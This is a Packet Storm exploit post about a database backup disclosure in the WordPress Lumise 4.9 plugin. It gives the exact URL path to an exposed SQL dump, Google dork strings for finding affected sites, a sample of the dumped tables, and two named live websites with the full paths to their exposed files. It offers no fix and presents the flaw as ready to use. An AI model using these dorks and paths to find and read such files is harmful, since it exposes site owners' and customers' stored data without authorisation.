exploit the possibilities

WordPress Lumise 4.9 Database Disclosure

WordPress Lumise 4.9 Database Disclosure
Posted Dec 17, 2018
Authored by KingSkrupellos

WordPress Lumise plugin version 4.9 suffers from a database disclosure vulnerability.

tags | exploit, info disclosure
MD5 | a9c2ae62364f2ccc4950028ac9e73d3e

WordPress Lumise 4.9 Database Disclosure

Change Mirror Download
#################################################################################################

# Exploit Title : WordPress Lumise Plugins 4.9 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 17/12/2018
# Vendor Homepage : wordpress.org ~ sequelpro.com ~ lumise.com
+ codecanyon.net/category/wordpress?tags=lumise
# Software Download Link :
codecanyon.net/item/lumise-product-designer-woocommerce-wordpress/21222684
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : WordPress 4.7.x - 4.9.x
+ Compatible With : WooCommerce 3.0.x - 3.2.x
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/lumise/woo/''
+ intext:''Projetado por "AgAancia dPublicidade"''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/plugins/lumise/woo/sample/database.txt

#################################################################################################

# Example SQL Dump Some Informations and SQL Tables Dumps =>

# ************************************************************
# Sequel Pro SQL dump
# Version 4541
#
# sequelpro.com/
# github.com/sequelpro/sequelpro
#
# Host: 127.0.0.1 (MySQL 5.7.18)
# Database: lumise
************************************************************

# Dump of table lumise_bugs

# Dump of table lumise_categories

# Dump of table lumise_categories_reference

# Dump of table lumise_cliparts

# Dump of table lumise_designs

# Dump of table lumise_fonts

# Dump of table lumise_guests

# Dump of table lumise_languages

# Dump of table lumise_order_products

# Dump of table lumise_orders

# Dump of table lumise_printings

# Dump of table lumise_products

# Dump of table lumise_settings

# Dump of table lumise_shapes

# Dump of table lumise_shares

# Dump of table lumise_tags

# Dump of table lumise_tags_reference

# Dump of table lumise_templates

# Dumping data for table `lumise_products`

# Dumping data for table `lumise_shapes`

# Dumping data for table `lumise_settings`

INSERT INTO `lumise_products` (`id`, `name`, `price`, `product`,
`thumbnail`, `thumbnail_url`, `template`,
`description`, `stages`, `color`, `change_color`, `attributes`,
`printings`, `active`, `created`, `updated`,
`order`, `size`, `orientation`) VALUES

INSERT INTO `lumise_settings` (`id`, `key`, `value`, `created`, `updated`)
VALUES

#################################################################################################

# Example Vulnerable Sites =>

[+] mvmprint.bg/wp-content/plugins/lumise/woo/sample/database.txt

[+] criefacil.com/wp-content/plugins/lumise/woo/sample/database.txt

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    15 Files
  • 2
    Jan 2nd
    15 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    1 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    24 Files
  • 8
    Jan 8th
    15 Files
  • 9
    Jan 9th
    16 Files
  • 10
    Jan 10th
    23 Files
  • 11
    Jan 11th
    17 Files
  • 12
    Jan 12th
    3 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    33 Files
  • 16
    Jan 16th
    23 Files
  • 17
    Jan 17th
    29 Files
  • 18
    Jan 18th
    15 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close